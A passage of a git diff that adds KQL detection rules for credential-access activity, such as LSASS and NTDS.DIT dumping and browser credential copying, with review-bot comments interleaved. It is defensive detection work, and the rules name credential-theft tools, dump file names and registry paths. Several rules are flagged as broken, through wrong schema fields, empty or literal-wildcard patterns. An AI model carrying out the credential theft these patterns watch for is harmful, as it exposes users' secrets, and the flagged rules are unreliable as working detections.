+// False Positives:
+// - NTDS maintenance
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
new file mode 100644
index 00000000..a84d7439
--- /dev/null
+++ b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
@@ -0,0 +1,13 @@
+// Title: Loaded Module Enumeration Via Tasklist.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: medium
+// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
+This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
+In order to dump the process memory or perform other nefarious actions.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-m" or ProcessCommandLine contains "/m" or ProcessCommandLine contains "–m" or ProcessCommandLine contains "—m" or ProcessCommandLine contains "―m") and (FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe") and ProcessCommandLine contains "rdpcorets.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
new file mode 100644
index 00000000..32fc34d6
--- /dev/null
+++ b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
@@ -0,0 +1,13 @@
+// Title: LSASS Dump Keyword In CommandLine
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql
new file mode 100644
index 00000000..784863db
--- /dev/null
+++ b/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql
@@ -0,0 +1,12 @@
+// Title: Lsass Full Dump Request Via DumpType Registry Settings
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate application that needs to do a full dump of their process
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql
new file mode 100644
index 00000000..3caa51d8
--- /dev/null
+++ b/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Process Dump Artefact In CrashDumps Folder
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare legitimate dump of the process by the operating system due to a crash of lsass
+
+DeviceFileEvents
+| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
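Review bot: In lsass_full_dump_request_via_dumptype_registry_settings.kql, `RegistryValueData =~ "DWORD (0x00000002)"` is the Sysmon `Details` rendering of a DWORD, and `RegistryKey contains "...\\LocalDumps\\DumpType"` assumes the value name is appended to the key path as in Sysmon's `TargetObject`; as far as I know the `DeviceRegistryEvents` table this query targets stores DWORD data as the plain number and keeps the value name in the separate `RegistryValueName` column, so neither predicate can match there and the rule is silent. A rendering that fits that schema is `| where RegistryValueName =~ "DumpType" and RegistryValueData == "2" and (RegistryKey endswith "\\Windows Error Reporting\\LocalDumps" or RegistryKey endswith "\\Windows Error Reporting\\LocalDumps\\lsass.exe")`; confirm the exact data formatting against a live event before relying on it. Because the `DWORD (0x...)` literal comes from the source rule's `Details` field, every registry rule in this patch that carries such a literal has the same problem and the converter should map `Details`/`TargetObject` to `RegistryValueData`/`RegistryKey`+`RegistryValueName` rather than copy them through.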
diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
new file mode 100644
index 00000000..d75b0ba2
--- /dev/null
+++ b/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-10-19
+// Level: high
+// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql
new file mode 100644
index 00000000..51bdd5d6
--- /dev/null
+++ b/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql
@@ -0,0 +1,10 @@
+// Title: LSASS Process Memory Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-15
+// Level: high
+// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp" or FolderPath endswith "\\rustive.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdmp" or FolderPath contains "\\lsassdump") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or ((FolderPath contains "\\nanodump" or FolderPath contains "\\proc_") and FolderPath endswith ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..c7374d0b
--- /dev/null
+++ b/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: LSASS Process Reconnaissance Via Findstr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " -i \"lsass" or ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " –i \"lsass" or ProcessCommandLine contains " —i \"lsass" or ProcessCommandLine contains " ―i \"lsass" or ProcessCommandLine contains " -i lsass.exe" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains " –i lsass.exe" or ProcessCommandLine contains " —i lsass.exe" or ProcessCommandLine contains " ―i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql
new file mode 100644
index 00000000..49aed8f5
--- /dev/null
+++ b/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft IIS Connection Strings Decryption
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql
new file mode 100644
index 00000000..36361a87
--- /dev/null
+++ b/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft IIS Service Account Password Dumped
+// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
+// Date: 2022-11-08
+// Level: high
+// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
new file mode 100644
index 00000000..298e6b33
--- /dev/null
+++ b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
@@ -0,0 +1,11 @@
+// Title: Microsoft Teams Sensitive File Access By Uncommon Applications
+// Author: @SerkinValery
+// Date: 2024-07-22
+// Level: medium
+// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceFileEvents
+| where (FileName contains "\\Microsoft\\Teams\\Cookies" or FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql
new file mode 100644
index 00000000..985f4f6f
--- /dev/null
+++ b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql
@@ -0,0 +1,10 @@
+// Title: Mount Execution With Hidepid Parameter
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1564
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "hidepid=2" and ProcessCommandLine contains " -o ") and FolderPath endswith "/mount"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
new file mode 100644
index 00000000..285f26e8
--- /dev/null
+++ b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
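Review bot: In microsoft_teams_sensitive_file_access_by_uncommon_applications.kql the predicates `FileName contains "\\Microsoft\\Teams\\Cookies"` and `FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb"` cannot match, because `FileName` in `DeviceFileEvents` holds only the leaf name while the directory lives in `FolderPath`, the column every other file rule in this patch uses for path matching; change both to `FolderPath contains ...`. This looks like the converter mapping the source rule's `TargetFilename`-style field to `FileName` for this one category, so the same substitution is worth checking in the other file-access rules. Separately, as far as I know that table records create, modify, rename and delete actions rather than reads, so a rule written for a file-access event source will stay mostly silent even after the field fix; either note this limitation in the header (`// Note: DeviceFileEvents does not record read access; this fires only on writes to these paths`) or drop the rule from the generated set.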
@@ -0,0 +1,14 @@
+// Title: New Generic Credentials Added Via Cmdkey.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-03
+// Level: medium
+// Description: Detects usage of "cmdkey.exe" to add generic credentials.
+As an example, this can be used before connecting to an RDP session via command line interface.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+// - Legitimate usage for administration purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p" or ProcessCommandLine contains " –p" or ProcessCommandLine contains " —p" or ProcessCommandLine contains " ―p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u" or ProcessCommandLine contains " –u" or ProcessCommandLine contains " —u" or ProcessCommandLine contains " ―u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_dit_created.kql b/KQL/rules/Credential Access/ntds_dit_created.kql
new file mode 100644
index 00000000..e2defb35
--- /dev/null
+++ b/KQL/rules/Credential Access/ntds_dit_created.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: low
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..eba0d7ab
--- /dev/null
+++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Creation By Uncommon Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..a344ac8b
--- /dev/null
+++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql
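Review bot: In ntds_dit_creation_by_uncommon_parent_process.kql the second `or` group ends in four copies of `InitiatingProcessParentFileName startswith ""`, which is an empty pattern rather than a parent name. If Kusto evaluates an empty-string `startswith` as true, which I believe it does, the whole parent-process condition is always satisfied and the rule collapses to "any ntds.dit creation" at level high, duplicating ntds_dit_created.kql at the wrong severity; if it evaluates as false the four predicates are dead code and four of the source rule's patterns are silently lost. Either way the empty literals point to values the converter dropped, most likely because the source field used a modifier (a directory `contains` rather than an image-name `startswith`) that was not carried over; restore the original values with the right operator from the Sigma source, and have the converter fail or warn instead of emitting `""` when a list entry renders empty.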
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Creation By Uncommon Process
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql
new file mode 100644
index 00000000..ff5cdac2
--- /dev/null
+++ b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql
@@ -0,0 +1,10 @@
+// Title: NTDS Exfiltration Filename Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..0b259a6a
--- /dev/null
+++ b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
+This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/Credential Access/potential_browser_data_stealing.kql
new file mode 100644
index 00000000..1303b99a
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_browser_data_stealing.kql
@@ -0,0 +1,13 @@
+// Title: Potential Browser Data Stealing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: medium
+// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
+Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
+Web browsers typically store the credentials in an encrypted format within a credential store.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\esentutl.exe" or FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("esentutl.exe", "XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
new file mode 100644
index 00000000..6cee6571
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Other legitimate network providers used and not filtred in this rule
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
new file mode 100644
index 00000000..cc0b9dd7
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Other legitimate network providers used and not filtred in this rule
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\System\\CurrentControlSet\\Services*" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql
new file mode 100644
index 00000000..3162f7cb
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql
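Review bot: `RegistryKey endswith "\\System\\CurrentControlSet\\Services*"` treats the trailing `*` as a literal character (KQL `endswith` has no wildcard support), so this condition never matches a real key and the rule is dead. The same leaked wildcard appears in potentially_suspicious_odbc_driver_registered (`RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*"`), where it is additionally ANDed with a second `endswith` on the same column. Replace it with a substring match, e.g. `RegistryKey contains "\\System\\CurrentControlSet\\Services\\"`, and fix the converter's handling of source-rule wildcards so this does not recur.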
@@ -0,0 +1,10 @@
+// Title: Potential Credential Dumping Via LSASS Process Clone
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2021-11-27
+// Level: critical
+// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.001
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
new file mode 100644
index 00000000..f49027a9
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-26
+// Level: critical
+// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql
new file mode 100644
index 00000000..4c0c29b3
--- /dev/null
+++ b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Via WER
+// Author: @pbssubhash , Nasreddine Bencherchali
+// Date: 2022-12-08
+// Level: high
+// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.
+
+DeviceProcessEvents
